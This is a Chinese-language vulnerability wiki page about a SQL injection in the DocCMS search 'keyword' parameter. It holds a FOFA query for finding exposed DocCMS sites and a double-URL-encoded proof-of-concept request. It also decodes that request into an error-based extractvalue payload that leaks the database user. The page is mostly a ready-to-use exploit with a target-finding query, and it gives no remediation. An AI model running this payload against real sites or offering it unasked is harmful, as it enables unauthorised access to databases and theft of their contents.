menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right DocCMS chevron_right DocCMS keyword SQL注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    DocCMS keyword SQL注入漏洞.md
    1.47 KB / 2021-07-04 06:01:08
        # DocCMS keyword SQL注入漏洞
    
    ## 漏洞描述
    
    DocCMS keyword参数存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库信息
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > DocCMS
    
    ## FOFA
    
    > [!NOTE]
    >
    > app="Doccms" 
    
    ## 漏洞复现
    
    CMS官网
    
    ![image-20210702110657409](http://wikioss.peiqi.tech/vuln/image-20210702110657409.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    验证POC
    
    ```
    /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33
    ```
    
    ![image-20210702110838286](http://wikioss.peiqi.tech/vuln/image-20210702110838286.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    其中payload为下列语句的二次Url编码
    
    ```
    ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
    ```
    
    
    
    links
    file_download